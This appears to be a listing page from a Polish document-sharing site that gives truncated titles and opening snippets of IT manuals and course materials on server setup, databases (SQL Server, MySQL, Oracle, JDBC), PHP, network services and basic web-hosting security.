Currenda EPO Instrukcja Konfiguracji Wersja dokumentu: 1.3 Currenda EPO Instrukcja Konfiguracji - wersja dokumentu 1.3-19.08.2014 Spis treści 1 Wstęp... 4 1.1 Cel dokumentu... 4 1.2 Powiązane dokumenty...
Bardziej szczegółowoTomasz Greszata - Koszalin
T: Usługi serwerowe w systemie Windows - telnet. Zadanie1: Sprawdź informacje w serwisie Wikipedii na temat usługi telnet. Telnet standard protokołu komunikacyjnego używanego w sieciach komputerowych do
Bardziej szczegółowoPlan. Wprowadzenie. Co to jest APEX? Wprowadzenie. Administracja obszarem roboczym
1 Wprowadzenie do środowiska Oracle APEX, obszary robocze, użytkownicy Wprowadzenie Plan Administracja obszarem roboczym 2 Wprowadzenie Co to jest APEX? Co to jest APEX? Architektura Środowisko Oracle
Bardziej szczegółowoRys. 1. Widok uruchomienia polecenia apt-get install build-essential. Rys. 2. Widok uruchomienia polecenia apt-get install apache2
1. Instalacja serwera WWW Aby zainstalować serwer WWW w systemie Linux, należy wykorzystać menedżer pakietów apt-get. Polecenia które należy wpisać w terminalu użytkownika root 1 : apt-get install build-essential
Bardziej szczegółowoAudytowane obszary IT
Załącznik nr 1 do OPZ Zakres audytu wewnętrznego Audytowane obszary IT Audyt bezpieczeństwa wewnętrznego odbywać się będzie w 5 głównych obszarach 1) Audyt konfiguracji systemów operacyjnych na wybranych
Bardziej szczegółowoInformatyka I. Standard JDBC Programowanie aplikacji bazodanowych w języku Java
Informatyka I Standard JDBC Programowanie aplikacji bazodanowych w języku Java dr inż. Andrzej Czerepicki Politechnika Warszawska Wydział Transportu 2017 Standard JDBC Java DataBase Connectivity uniwersalny
Bardziej szczegółowoNiezbędne narzędzia. Przed rozpoczęciem pracy z PHP należy zainstalować odpowiednie narzędzia: środowisko PHP serwer WWW serwer baz danych MySQL
Instalowanie PHP Niezbędne narzędzia Przed rozpoczęciem pracy z PHP należy zainstalować odpowiednie narzędzia: środowisko PHP serwer WWW serwer baz danych MySQL Serwer lokalny Serwer lokalny można zainstalować
Bardziej szczegółowoWin Admin Monitor Instrukcja Obsługi
Win Admin Monitor Instrukcja Obsługi czerwiec 2019 wersja dokumentu 1.7 dla wersji aplikacji 2.1.1.0 Spis treści: I. Wstęp 3 II. Wymagania systemowe 4 III. Ograniczenia funkcjonalne wersji demo 5 IV. Instalacja
Bardziej szczegółowoWykaz zmian w programie SysLoger
Wykaz zmian w programie SysLoger Pierwsza wersja programu 1.0.0.1 powstała we wrześniu 2011. Funkcjonalność pierwszej wersji programu: 1. Zapis logów do pliku tekstowego, 2. Powiadamianie e-mail tylko
Bardziej szczegółowoSIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja
SIP Studia Podyplomowe Ćwiczenie laboratoryjne Instrukcja Instytut Telekomunikacji Wydział Elektroniki i Technik Informacyjnych Politechnika Warszawska, marzec 2015 Wprowadzenie Ćwiczenie jest wykonywane
Bardziej szczegółowoProblemy techniczne SQL Server
Problemy techniczne SQL Server Jak utworzyć i odtworzyć kopię zapasową bazy danych za pomocą narzędzi serwera SQL? Tworzenie i odtwarzanie kopii zapasowych baz danych programów Kadry Optivum, Płace Optivum,
Bardziej szczegółowoBezpieczne udostępnianie usług www. BłaŜej Miga blazej.miga@man.poznan.pl. Zespół Bezpieczeństwa PCSS
Bezpieczne udostępnianie usług www BłaŜej Miga blazej.miga@man.poznan.pl Zespół Bezpieczeństwa PCSS Wstęp Bezpieczny hosting IIS + ASP.NET - dobrana para ZagroŜenia przykładowe ataki Zabezpieczamy serwer
Bardziej szczegółowoWYDAWANIE CZYTNIKAMI BY CTI Instrukcja
WYDAWANIE CZYTNIKAMI BY CTI Instrukcja 1 Spis treści 1. Opis programu...3 2. Nawiązanie połączenia...3 3. Logowanie do programu...5 4. Okno główne programu...6 5. Konfiguracja programu...6 6. Generowanie
Bardziej szczegółowoPracownia internetowa w szkole ZASTOSOWANIA
NR ART/SBS/07/01 Pracownia internetowa w szkole ZASTOSOWANIA Artykuły - serwery SBS i ich wykorzystanie Instalacja i Konfiguracja oprogramowania MOL Optiva na szkolnym serwerze (SBS2000) Artykuł opisuje
Bardziej szczegółowoCREATE USER
Temat: Administrowanie użytkownikami bazy danych. Po instalacji serwera MYSQL dostępne jest konto o nazwie root. Domyślnie nie ma ono przypisanego hasła, aczkolwiek podczas procesu konfiguracji jest możliwość
Bardziej szczegółowoT-SQL dla każdego / Alison Balter. Gliwice, cop Spis treści. O autorce 11. Dedykacja 12. Podziękowania 12. Wstęp 15
T-SQL dla każdego / Alison Balter. Gliwice, cop. 2016 Spis treści O autorce 11 Dedykacja 12 Podziękowania 12 Wstęp 15 Godzina 1. Bazy danych podstawowe informacje 17 Czym jest baza danych? 17 Czym jest
Bardziej szczegółowoBazy danych i strony WWW
Bazy danych i strony WWW Obsługa baz danych poprzez strony WWW Niezbędne narzędzia: serwer baz danych np. MySQL serwer stron WWW np. Apache przeglądarka stron WWW interpretująca język HTML język skryptowy
Bardziej szczegółowoSSI Katalog. Program do katalogowania zawartości dysków. Dariusz Kalinowski
1.) Wymagania sprzętowe: SSI Katalog Program do katalogowania zawartości dysków Dariusz Kalinowski - System operacyjny: Windows 2000 lub Windows xp - Procesor minimum Pentium 1Ghz - Pamięć RAM minimum
Bardziej szczegółowoInstrukcje instalacji pakietu IBM SPSS Data Access Pack dla systemu Windows
Instrukcje instalacji pakietu IBM SPSS Data Access Pack dla systemu Windows Spis treści Rozdział 1. Przegląd......... 1 Wstęp................. 1 Wdrażanie technologii Data Access........ 1 Źródła danych
Bardziej szczegółowoForte Zarządzanie Produkcją Instalacja i konfiguracja. Wersja B
Forte Zarządzanie Produkcją Instalacja i konfiguracja Wersja 2013.1.B Forte Zarządzanie Produkcją - Instalacja i konfiguracja Strona 2 z 13 SPIS TREŚCI 1 Instalacja i konfiguracja Forte Zarządzanie Produkcją...
Bardziej szczegółowoWybrane działy Informatyki Stosowanej
Wybrane działy Informatyki Stosowanej JSP - Java Server Pages dr hab. inż. Andrzej Czerepicki a.czerepicki@wt.pw.edu.pl http://www2.wt.pw.edu.pl/~a.czerepicki 2019 Aplikacje i skrypty WWW klasyfikacja
Bardziej szczegółowoHosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas)
Hosting WWW Bezpieczeństwo hostingu WWW Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas) Najgroźniejsze ataki na serwer WWW Najgroźniejsze ataki na serwer WWW Cross-site scripting (XSS) SQL injection Denial
Bardziej szczegółowoI. Informacje ogólne. Jednym z takich systemów jest Mambo.
MAMBO (CMS) I. Informacje ogólne CMS, Content Management System ("system zarządzania treścią") jest to jedna lub zestaw aplikacji internetowych pozwalających na łatwe utworzenie oraz późniejszą aktualizację
Bardziej szczegółowoInformatyka I. Programowanie aplikacji bazodanowych w języku Java. Standard JDBC.
Informatyka I Programowanie aplikacji bazodanowych w języku Java. Standard JDBC. dr hab. inż. Andrzej Czerepicki Politechnika Warszawska Wydział Transportu 2019 Standard JDBC Java DataBase Connectivity
Bardziej szczegółowoINFORMATYKA MÓJ SPOSÓB NA POZNANIE I OPISANIE ŚWIATA PROGRAM NAUCZANIA INFORMATYKI Z ELEMENTAMI PRZEDMIOTÓW MATEMATYCZNO-PRZYRODNICZYCH
INFORMATYKA MÓJ SPOSÓB NA POZNANIE I OPISANIE ŚWIATA PROGRAM NAUCZANIA INFORMATYKI Z ELEMENTAMI PRZEDMIOTÓW MATEMATYCZNO-PRZYRODNICZYCH Informatyka poziom rozszerzony Serwis WWW w projekcie edukacyjnym
Bardziej szczegółowoe-audytor v.3.x INSTRUKCJA INSTALACJI I URUCHOMIENIA SYSTEMU
Wprowadzenie 1 e-audytor v.3.x INSTRUKCJA INSTALACJI I URUCHOMIENIA SYSTEMU W celu wyłączenia automatycznego QuickStartu należy z poziomu econsole w menu: Narzędzia > Konfiguracja > e-console w Konfiguracji
Bardziej szczegółowoSkanowanie podsieci oraz wykrywanie terminali ABA-X3
Skanowanie podsieci oraz wykrywanie terminali ABA-X3 Terminale ABA-X3 od dostarczane od połowy listopada 2010 r. są wyposażane w oprogramowanie umożliwiające skanowanie podsieci w poszukiwaniu aktywnych
Bardziej szczegółowoSystem Kancelaris. Zdalny dostęp do danych
Kancelaris krok po kroku System Kancelaris Zdalny dostęp do danych Data modyfikacji: 2008-07-10 Z czego składaj adają się systemy informatyczne? System Kancelaris składa się z dwóch części: danych oprogramowania,
Bardziej szczegółowoInstrukcja instalacji środowiska testowego na TestingCup wersja 1.0
Instrukcja instalacji środowiska testowego na TestingCup 2017 wersja 1.0 Spis treści: 1. Wstęp Błąd! Nie zdefiniowano zakładki. 2. Konfiguracja sprzętowa 2 3. Instalacja bazy danych MySQL 5.7 2 4. Import
Bardziej szczegółowoLaboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark
Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark Topologia Cele Część 1: Zapisanie informacji dotyczących konfiguracji IP komputerów Część 2: Użycie programu Wireshark do przechwycenia
Bardziej szczegółowoBazy Danych. Ćwiczenie 1: Przygotowanie środowiska pracy dla bazy MySQL z wykorzystaniem XAMPP Portable Lite oraz MySQL-Front
Instytut Sterowania i Systemów Informatycznych Uniwersytet Zielonogórski Bazy Danych Ćwiczenie 1: Przygotowanie środowiska pracy dla bazy MySQL z wykorzystaniem XAMPP Portable Lite oraz MySQL-Front opracował:
Bardziej szczegółowoInstalacja (GM) AMXBans #1.5.1/ #1.6.1 na serwerze gry/stronie WWW. Wymagania
Instalacja (GM) AMXBans #1.5.1/ #1.6.1 na serwerze gry/stronie WWW Wymagania Aby poprawnie zainstalować (GM) AMXBans # 1.5.1/ # 1.6.1, potrzebujemy; * Najnowsze wydanie MetaModa * Najnowsza wersja AMXMod
Bardziej szczegółowoSieciowa instalacja Sekafi 3 SQL
Sieciowa instalacja Sekafi 3 SQL Niniejsza instrukcja opisuje instalację Sekafi 3 SQL w wersji sieciowej, z zewnętrznym serwerem bazy danych. Jeśli wymagana jest praca jednostanowiskowa, należy postępować
Bardziej szczegółowowww.kwp.edu.pl Instrukcja obsługi/instalacji platformy Krok w Przedsiębiorczość Administrator platformy
www.kwp.edu.pl Instrukcja obsługi/instalacji platformy Krok w Przedsiębiorczość Administrator platformy Wersja: 4_23/07/2012 1 Spis treści 1. Wymagania... 3 2. Konfiguracja serwera... 3 3. Parametry konfiguracyjne
Bardziej szczegółowoPodstawy technologii WWW
Podstawy technologii WWW Ćwiczenie 8 PHP, czyli poczatki nowej, dynamicznej znajomosci Na dzisiejszych zajęciach rozpoczniemy programowanie po stronie serwera w języku PHP. Po otrzymaniu żądania serwer
Bardziej szczegółowoWykład 6: PHP: praca z bazą danych MySQL, cz.2
Wykład 6: PHP: praca z bazą danych MySQL, cz.2 Połączenie z bazą danych (cba.pl) Uwaga ogólna: Gdy korzystamy z usługi hostingowej: usługodawca poda nam nasz login, hasło i nazwę bazy danych (przy bezpłatnej
Bardziej szczegółowoCechy systemu X Window: otwartość niezależność od producentów i od sprzętu, dostępny kod źródłowy; architektura klient-serwer;
14.3. Podstawy obsługi X Window 14.3. Podstawy obsługi X Window W przeciwieństwie do systemów Windows system Linux nie jest systemem graficznym. W systemach Windows z rodziny NT powłokę systemową stanowi
Bardziej szczegółowoMigracja bazy danych Microsoft Access *.mdb do Microsoft SQL 2008 Server R2 SP1 dla oprogramowania Płatnik
Migracja bazy danych Microsoft Access *.mdb do Microsoft SQL 2008 Server R2 SP1 dla oprogramowania Płatnik by Gecco-IT http://www.gecco-it.waw.pl info@gecco-it.waw.pl 1. Zanim przystąpimy do migracji należy
Bardziej szczegółowoZadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat usługi DHCP.
T: Konfiguracja usługi DHCP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat usługi DHCP. DHCP (ang. Dynamic Host Configuration Protocol) protokół komunikacyjny
Bardziej szczegółowoOPROGRAMOWANIE KEMAS zbudowane jest na platformie KEMAS NET
Security Systems Risk Management OPROGRAMOWANIE KEMAS zbudowane jest na platformie KEMAS NET Oprogramowanie firmy KEMAS jest zbudowane na bazie pakietu programowego- KEMAS NET- dedykowanego do zarządzania
Bardziej szczegółowoWykaz zmian w programie Win Admin Replikator
Wykaz zmian w programie Win Admin Replikator Pierwsza wersja programu 1.0.0.0 powstała w czerwcu 2010. kod źródłowy programu zawiera ponad 6 900 wierszy. Modyfikacje/zmiany w wersji 1.0.4.0 (październik
Bardziej szczegółowoRozdział ten zawiera informacje na temat zarządzania Modułem Modbus TCP oraz jego konfiguracji.
1 Moduł Modbus TCP Moduł Modbus TCP daje użytkownikowi Systemu Vision możliwość zapisu oraz odczytu rejestrów urządzeń, które obsługują protokół Modbus TCP. Zapewnia on odwzorowanie rejestrów urządzeń
Bardziej szczegółowoInstrukcja obsługi serwera FTP v.28.12.2010
Instrukcja obsługi serwera FTP v.28.12.2010 1. Dostęp klienta do konta FTP 1.1. Wprowadzić do przeglądarki adres ftp://87.204.185.42 lub alternatywny adres IP ftp://82.11.1160.114 1.2. Wprowadzić nazwę
Bardziej szczegółowoInstrukcja do panelu administracyjnego. do zarządzania kontem FTP WebAs. www.poczta.greenlemon.pl
Instrukcja do panelu administracyjnego do zarządzania kontem FTP WebAs www.poczta.greenlemon.pl Opracowanie: Agencja Mediów Interaktywnych GREEN LEMON Spis treści 1.Wstęp 2.Konfiguracja 3.Konto FTP 4.Domeny
Bardziej szczegółowoInstalacja SQL Server Express. Logowanie na stronie Microsoftu
Instalacja SQL Server Express Logowanie na stronie Microsoftu Wybór wersji do pobrania Pobieranie startuje, przechodzimy do strony z poradami. Wypakowujemy pobrany plik. Otwiera się okno instalacji. Wybieramy
Bardziej szczegółowoNIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI
NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI asix Połączenie sieciowe z wykorzystaniem VPN Pomoc techniczna Dok. Nr PLP0014 Wersja: 16-04-2009 ASKOM i asix to zastrzeżone znaki firmy ASKOM Sp. z o. o., Gliwice.
Bardziej szczegółowoTomasz Greszata - Koszalin
T: Konfiguracja usługi HTTP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołów HTTP oraz HTTPS i oprogramowania IIS (ang. Internet Information Services).
Bardziej szczegółowoI. INSTALACJA BAZY DANYCH ORACLE10g EXPRESS EDITION
I. INSTALACJA BAZY DANYCH ORACLE10g EXPRESS EDITION Plik instalacyjny mo na uzyska ze stron firmy Oracle http://otn.oracle.com, wybieraj c w rozwijanym menu DOWNLOADS Database. Aby pobra interesuj c nas
Bardziej szczegółowoInstytut Teleinformatyki
Instytut Teleinformatyki Wydział Fizyki, Matematyki i Informatyki Politechnika Krakowska Laboratorium Administrowania Systemami Komputerowymi Konfiguracja i administracja bazą danych MySQL ćwiczenie numer
Bardziej szczegółowo4. Projekt Bazy Danych
4. Projekt Bazy Danych 4.1. Opis rozdziału W tym rozdziale przedstawiono prosty projekt bazy danych dla naszej gry. 4.2. Dane logowania Na początku zastanówmy się jakie dane będą nam potrzebne do zarejestrowania
Bardziej szczegółowoWszystkie parametry pracy serwera konfigurujemy w poszczególnych zakładkach aplikacji, podzielonych wg zakresu funkcjonalnego.
Sz@rk Server - konfigurowanie systemu Sz@rk Server jest serwerem aplikacji z wydzieloną logiką biznesową, pracującym w architekturze opartej o usługi (SOA). Dane pomiędzy serwerem i klientami przesyłane
Bardziej szczegółowoZakres tematyczny dotyczący kursu PHP i MySQL - Podstawy pracy z dynamicznymi stronami internetowymi
Zakres tematyczny dotyczący kursu PHP i MySQL - Podstawy pracy z dynamicznymi stronami internetowymi 1 Rozdział 1 Wprowadzenie do PHP i MySQL Opis: W tym rozdziale kursanci poznają szczegółową charakterystykę
Bardziej szczegółowoInstrukcja instalacji połączenia sterownika PL11-MUT24 ze stroną internetową.
Instrukcja instalacji połączenia sterownika PL11-MUT24 ze stroną internetową. Wymagania systemowe: Windows XP, Windows Vista, Windows 7 Krok pierwszy- serwer: 1. Do poprawnego działania aplikacji wymagane
Bardziej szczegółowoSpis treści. 1 Moduł Modbus TCP 4
Spis treści 1 Moduł Modbus TCP 4 1.1 Konfigurowanie Modułu Modbus TCP................. 4 1.1.1 Lista elementów Modułu Modbus TCP............ 4 1.1.2 Konfiguracja Modułu Modbus TCP.............. 5 1.1.3
Bardziej szczegółowoDokumentacja SMS przez FTP
Dokumentacja SMS przez FTP 1 Wprowadzenie... 2 Właściwości plików... 3 Tworzenie konfiguracji w Panelu Klienta... 4 Raporty doręczeń... 5 Historia zmian... 6 2 Wprowadzenie Usługa wysyłki SMS przez FTP
Bardziej szczegółowoProjektowanie bezpieczeństwa sieci i serwerów
Projektowanie bezpieczeństwa sieci i serwerów Konfiguracja zabezpieczeń stacji roboczej 1. Strefy bezpieczeństwa przeglądarki Internet Explorer. W programie Internet Explorer można skonfigurować ustawienia
Bardziej szczegółowoProdukcja by CTI. Proces instalacji, ważne informacje oraz konfiguracja
Produkcja by CTI Proces instalacji, ważne informacje oraz konfiguracja Spis treści 1. Ważne informacje przed instalacją...3 2. Instalacja programu...4 3. Nawiązanie połączenia z serwerem SQL oraz z programem
Bardziej szczegółowoSystem kontroli dostępu ACCO NET Instrukcja instalacji
System kontroli dostępu ACCO NET Instrukcja instalacji acco_net_i_pl 12/14 SATEL sp. z o.o. ul. Budowlanych 66 80-298 Gdańsk POLSKA tel. 58 320 94 00 serwis 58 320 94 30 dz. techn. 58 320 94 20; 604 166
Bardziej szczegółowoDokumentacja fillup - MS SQL
Dokumentacja fillup - MS SQL e-file.pl 28 lipca 2017 Spis treści Wstęp 2 Wymagania sprzętowe 2 Windows Server 2012.......................... 2 Windows 10............................... 3 MS SQL Server.............................
Bardziej szczegółowoasix4 Podręcznik użytkownika BAZA - drajwer dostępu do baz danych Podręcznik użytkownika
Podręcznik użytkownika Podręcznik użytkownika Dok. Nr PLP4010 Wersja: 04-10-2005 Podręcznik użytkownika ASKOM i asix to zastrzeżone znaki firmy ASKOM Sp. z o. o., Gliwice. Inne występujące w tekście znaki
Bardziej szczegółowostrukturalny język zapytań używany do tworzenia i modyfikowania baz danych oraz do umieszczania i pobierania danych z baz danych
SQL SQL (ang. Structured Query Language): strukturalny język zapytań używany do tworzenia strukturalny język zapytań używany do tworzenia i modyfikowania baz danych oraz do umieszczania i pobierania danych
Bardziej szczegółowoInstrukcja instalacji
Instrukcja instalacji Nintex USA LLC 2012. Wszelkie prawa zastrzeżone. Zastrzegamy sobie prawo do błędów i pominięć. support@nintex.com 1 www.nintex.com Spis treści 1. Instalowanie programu Nintex Workflow
Bardziej szczegółowo